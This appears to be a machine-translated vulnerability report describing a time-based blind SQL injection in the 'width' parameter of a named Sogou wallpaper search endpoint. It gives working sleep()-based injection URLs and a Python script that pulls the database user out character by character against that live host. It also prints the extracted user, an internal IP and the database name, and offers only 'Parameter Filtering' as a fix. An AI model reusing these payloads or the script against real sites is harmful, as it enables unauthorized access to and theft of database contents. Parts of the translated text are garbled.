SQL blind injection vulnerability in sogou SQL injection 5 Wallpaper

SQL blind injection vulnerability in sogou SQL injection 5 Wallpaper

 

A MySQL blind note for wallpaper search:

The following link delay is about 4 seconds. We can see that the width parameter can be injected:

Http://so.bizhi.sogou.com/iosquery? Dn = iPhone6, 2 & dr = 640*1136 & dv = 8.0.2 & h = aaaaaaa & height = 1136 & r = 0000-0000 & v = 1.3.4.0005 & width = aa % 22% 2b (select (0) from (select (sleep (4) v) % 2b % 22 & word = test

The following link can be guessed that the current user () length is 23:

Http://so.bizhi.sogou.com/iosquery? Dn = iPhone6, 2 & dr = 640*1136 & dv = 8.0.2 & h = aaaaaaa & height = 1136 & r = 0000-0000 & v = 1.3.4.0005 & width = aa % 22% 2b (select (0) from (select (sleep (if (length (user () = 23,5, 0) v) % 2b % 22 & word = test

After the latency is 5 seconds, the page will display:

"The page you are looking for is temporarily unavailable ."

Write several lines of python scripts, and guess whether the returned time is greater than 5 seconds and whether a feature string exists ().
 

import httplibimport timeimport stringimport sysimport randomimport urllibheaders = {    'Cookie': '',    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',}payloads = list(string.ascii_lowercase)payloads += list(string.ascii_uppercase)for i in range(0,10):    payloads.append(str(i))payloads += ['@','_', '.']print 'Current user() is:'user = ''for i in range(1,24,1):    for payload in payloads:        conn = httplib.HTTPConnection('so.bizhi.sogou.com', timeout=30)        rand_num = str(random.random())        url = '/iosquery?dn=iPhone6,2&dr=640*1136&dv=8.0.2&h=aaaaaaa&height=1136&r=0000-0000&v=1.3.4.0005&' + \              'width=aa%22%2b(select(0)from(select(sleep(if(ascii(mid(user(),' + str(i) + \              ',1))=' + str(ord(payload)) +  ',5,0))))v)%2b%22&word=test'        start_time = time.time()        conn.request(method='GET', url=url,                     headers = headers)        html_doc = conn.getresponse().read()        conn.close()        if time.time() - start_time > 5 and \           html_doc.find('The page you are looking for is temporarily unavailable.') > 0:            user += payload            sys.stdout.write( user + '\r' )            sys.stdout.flush()            break

 

 

Guess user () and get:

Wallpaper@10.1.3.5



Guess database () and get:

Wallpaper



Well, this figure shows that the script is random. Haha
 

 

Solution:

Parameter Filtering